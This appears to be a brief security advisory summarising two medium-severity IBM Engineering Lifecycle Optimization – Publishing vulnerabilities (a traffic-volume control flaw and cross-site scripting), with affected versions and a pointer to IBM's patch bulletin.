Severity

Medium

Analysis Summary

CVE-2021-39016 CVSS:4.3
IBM Engineering Lifecycle Optimization – Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the software to transmit more traffic than should be allowed for that actor.

CVE-2021-39015 CVSS:5.4
IBM Engineering Lifecycle Optimization – Publishing 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

Impact

• Security Bypass
• Cross-Site Scripting

Indicators Of Compromise

CVE

• CVE-2021-39016
• CVE-2021-39015

Affected Vendors

IBM

Affected Products

• IBM Engineering Lifecycle Optimization Publishing 6.0.6
• IBM Engineering Lifecycle Optimization Publishing 6.0.6.1
• IBM Engineering Lifecycle Optimization Publishing 7.0
• IBM Engineering Lifecycle Optimization Publishing 7.0.1
• IBM Engineering Lifecycle Optimization Publishing 7.0.2

Remediation

Refer to IBM Security Bulletin for patch, upgrade or suggested workaround information. 
IBM Security Bulletin